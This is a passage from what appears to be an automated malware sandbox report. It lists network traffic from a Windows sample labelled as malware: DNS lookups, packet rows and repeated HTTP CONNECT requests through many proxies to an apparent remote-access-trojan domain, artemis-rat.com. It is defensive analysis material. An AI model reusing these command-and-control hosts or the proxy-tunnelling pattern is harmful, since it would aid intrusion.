                                              Mar 11, 2024 08:37:19.085767031 CET805093950.169.23.170192.168.2.4
                                              Mar 11, 2024 08:37:19.086182117 CET51325443192.168.2.4104.21.54.158
                                              Mar 11, 2024 08:37:19.086199999 CET44351325104.21.54.158192.168.2.4
                                              Mar 11, 2024 08:37:19.086543083 CET44351325104.21.54.158192.168.2.4
                                              Mar 11, 2024 08:37:19.087754011 CET5160680192.168.2.4172.67.182.150
                                              Mar 11, 2024 08:37:19.087968111 CET51325443192.168.2.4104.21.54.158
                                              Mar 11, 2024 08:37:19.088792086 CET808051359185.200.37.98192.168.2.4
                                              Mar 11, 2024 08:37:19.089456081 CET5160736049192.168.2.4104.238.111.107
                                              Mar 11, 2024 08:37:19.090197086 CET41455080698.188.47.132192.168.2.4
                                              Mar 11, 2024 08:37:19.090265989 CET8051521190.5.77.211192.168.2.4
                                              Mar 11, 2024 08:37:19.090311050 CET508064145192.168.2.498.188.47.132

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Mar 11, 2024 08:37:14.332326889 CET192.168.2.41.1.1.10x1dbeStandard query (0)github.comA (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:18.453417063 CET192.168.2.41.1.1.10x8f5aStandard query (0)artemis-rat.comA (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:19.510482073 CET192.168.2.41.1.1.10xf2f7Standard query (0)ktxcomay.com.vnA (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:29.775122881 CET192.168.2.41.1.1.10x41a0Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:31.441217899 CET192.168.2.41.1.1.10x68acStandard query (0)terminal4.veeblehosting.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Mar 11, 2024 08:37:14.487183094 CET1.1.1.1192.168.2.40x1dbeNo error (0)github.com140.82.112.4A (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:18.656003952 CET1.1.1.1192.168.2.40x8f5aNo error (0)artemis-rat.com104.21.54.158A (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:18.656003952 CET1.1.1.1192.168.2.40x8f5aNo error (0)artemis-rat.com172.67.140.87A (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:20.345657110 CET1.1.1.1192.168.2.40xf2f7No error (0)ktxcomay.com.vn222.255.238.159A (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:29.932563066 CET1.1.1.1192.168.2.40x41a0No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:31.611927032 CET1.1.1.1192.168.2.40x68acNo error (0)terminal4.veeblehosting.com108.170.55.203A (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:31.611927032 CET1.1.1.1192.168.2.40x68acNo error (0)terminal4.veeblehosting.com108.170.55.202A (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:34.024492025 CET1.1.1.1192.168.2.40xd5e5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Mar 11, 2024 08:37:34.024492025 CET1.1.1.1192.168.2.40xd5e5No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                              Mar 11, 2024 08:37:47.277385950 CET1.1.1.1192.168.2.40x57f2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Mar 11, 2024 08:37:47.277385950 CET1.1.1.1192.168.2.40x57f2No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.44978841.86.252.914437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.613873959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.44979343.153.174.1064437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.623049974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.44980041.86.252.914437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.635478973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.44980143.153.174.1064437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.637861013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.44980341.86.252.914437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.641149044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.44980443.153.174.1064437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.641767025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.44980743.153.174.1064437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.644817114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449745104.27.37.131807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.691461086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:16.845912933 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.44977123.227.38.198807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.736274958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:16.890736103 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449782172.67.182.83807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.747718096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:16.901961088 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.44973938.162.29.19331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.750713110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.167423010 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.44978392.204.134.38425717284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.783222914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449798104.19.85.214807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.788094044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:16.942625999 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449735174.75.211.22241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.789331913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.44976340.76.160.14390027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.791124105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449761192.111.138.2941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.798625946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449797164.92.86.113602837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.803917885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.256764889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.772418976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.788158894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.866961956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054111004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257210970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.449772199.58.185.941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.820990086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.449818104.23.141.196807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.829623938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:16.984308958 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449819104.16.25.216807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.830791950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:16.985076904 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449824104.18.143.26807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.839895964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:16.994204044 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449839104.16.107.142807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.868463993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.023109913 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.449781114.156.77.10780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.873924017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.157504082 CET1286INHTTP/1.1 403 Forbidden
                                              Connection: close
                                              Content-Type: text/html
                                              Cache-Control: no-cache
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Content-Length: 4872
